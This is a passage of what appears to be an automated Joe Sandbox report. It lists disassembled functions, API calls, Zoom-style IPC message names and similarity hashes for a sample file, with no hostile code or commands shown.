                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserID$com.Zoom.app.conf.chat.with.buddy
                • API String ID: 3166440930-3420098469
                • Opcode ID: 95c02e4da6427695e66c9bb1e89262b74084559d654d2a13aa6fb36d484cd9e4
                • Instruction ID: 81c65a131e0699de5f9bba3457b6bc4fcfd85bc067dd30573ec3d8ed5bd67369
                • Opcode Fuzzy Hash: 95c02e4da6427695e66c9bb1e89262b74084559d654d2a13aa6fb36d484cd9e4
                • Instruction Fuzzy Hash: BBE0D8B0A0038067D7106B549C49B1E66B4AB5071AF504D6CB2159B3D2CBF44984C7B4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E677
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.open.dialpad,0000274C,Param,00000004), ref: 00C6E692
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Param$com.Zoom.app.pt.notify.open.dialpad
                • API String ID: 4281283084-1970144128
                • Opcode ID: 89f5b4911b6f0fb1cd096fd58b84f340010cec2c75aa23be0f12f93652243c3c
                • Instruction ID: fa1c62f1d00799d5a565458e8ccfafdda40ff8d63ac7d2b86399a7ccd7d958e5
                • Opcode Fuzzy Hash: 89f5b4911b6f0fb1cd096fd58b84f340010cec2c75aa23be0f12f93652243c3c
                • Instruction Fuzzy Hash: E0E0D8B1604B4097C3207B159C49B5F2AA49B50719FA0452DF1055F3D3CBF44940DF74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74607
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.keybase.message,00009D36,data,00000004), ref: 00C74622
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.keybase.message$data
                • API String ID: 3166440930-2581813706
                • Opcode ID: b4c539e4b1ae08ecc440e8b8dca4ba27eec4fdaa8a9423da356fdbee3f4feca3
                • Instruction ID: 8476c8c8f8100e5e0467d521c8f05a428630d398da8f701f99afc4c72aa10f31
                • Opcode Fuzzy Hash: b4c539e4b1ae08ecc440e8b8dca4ba27eec4fdaa8a9423da356fdbee3f4feca3
                • Instruction Fuzzy Hash: 82E0D8F4A01380A7D7307B149C45B1E66B4DB50756F404528B2015B392CBF48984D7B6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E617
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.audio.quality.notification,00009CE0,AudioQuality,00000004), ref: 00C6E632
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: AudioQuality$com.zoom.app.assistant.audio.quality.notification
                • API String ID: 4281283084-4212809801
                • Opcode ID: a1d1029a13caa10a01b25fe02bdbba82f93da504962b5f8c6ba6c81953e17770
                • Instruction ID: 3bd58b885e14a953101709d57d1113202cad520faa459ba8a8f884728bf11a46
                • Opcode Fuzzy Hash: a1d1029a13caa10a01b25fe02bdbba82f93da504962b5f8c6ba6c81953e17770
                • Instruction Fuzzy Hash: 74E0D8B0A0038067D721BB148C8AB1E66A4AF5071AF54442DB1015B3C2CBF48880DB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C7D7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.inter.process.audio.sharing.service.unregister.response,000027D8,result,00000004), ref: 00C6C7F2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.unregister.response$result
                • API String ID: 4281283084-120618529
                • Opcode ID: 27d48a779df756f68057c24ea1a0e271870551f09a97d4afe25c4c9d91874ef5
                • Instruction ID: 5221ffc4bbaac03cbd24e1e9ac766305f4945ca17ba3e70ce2cd328397db045a
                • Opcode Fuzzy Hash: 27d48a779df756f68057c24ea1a0e271870551f09a97d4afe25c4c9d91874ef5
                • Instruction Fuzzy Hash: 74E0D8B0A4078057C7207B144C8D75E26E49F54716F50451DB1455F3D1CBF44841DB76
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E7F7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.load.service.response,00009DD1,result,00000004), ref: 00C6E812
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.load.service.response$result
                • API String ID: 4281283084-3275189271
                • Opcode ID: bfbca34ae29e8e220fa9e02ade98480569f6ba7ab1d3f35c3e4ffa5c0e8a6e90
                • Instruction ID: 43f7d70816c17270b7ea26c6e2af755db02374d5759563465fd1811492a17491
                • Opcode Fuzzy Hash: bfbca34ae29e8e220fa9e02ade98480569f6ba7ab1d3f35c3e4ffa5c0e8a6e90
                • Instruction Fuzzy Hash: E8E0927090079067DB20AB55984571A22A49740B1AF440429B2055B392CEF84D04D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72747
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onuserupdated.notify,00009E7A,UsersJson,00000004), ref: 00C72762
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UsersJson$com.zoom.app.cci.ccivideo.onuserupdated.notify
                • API String ID: 3166440930-801263643
                • Opcode ID: 00caea4790d4118d59aee05a402e2f8cb9bceadbefcf7a5ccf05603fdae3c410
                • Instruction ID: 56e20a15f7e93f0a33d8b44f6d475d6742a6c468194a12f999315a9e5b0c003a
                • Opcode Fuzzy Hash: 00caea4790d4118d59aee05a402e2f8cb9bceadbefcf7a5ccf05603fdae3c410
                • Instruction Fuzzy Hash: 2DE0D8B0A003C0A7D7206B659C46B2E72B4EB50B16F504528B2019F3D2CFF44844D7B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76717
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.ps.response_to_term,0001388D,response,00000004), ref: 00C76732
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.ps.response_to_term$response
                • API String ID: 4281283084-1659213714
                • Opcode ID: 4e73cdf31405a602920e2bb170c0a4e5792e8b76630c87174ec6db1c935dfa44
                • Instruction ID: 6b041142156e9449e844785a79d6e0a124dad39d9364c6a3c02d2e9e6ab6ac24
                • Opcode Fuzzy Hash: 4e73cdf31405a602920e2bb170c0a4e5792e8b76630c87174ec6db1c935dfa44
                • Instruction Fuzzy Hash: C5E0DFB0A01380A7DB20BF148C85B2E62A4AB41B1AF80456CB2045B383CFF40D40D778
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C8D7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5C8F2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
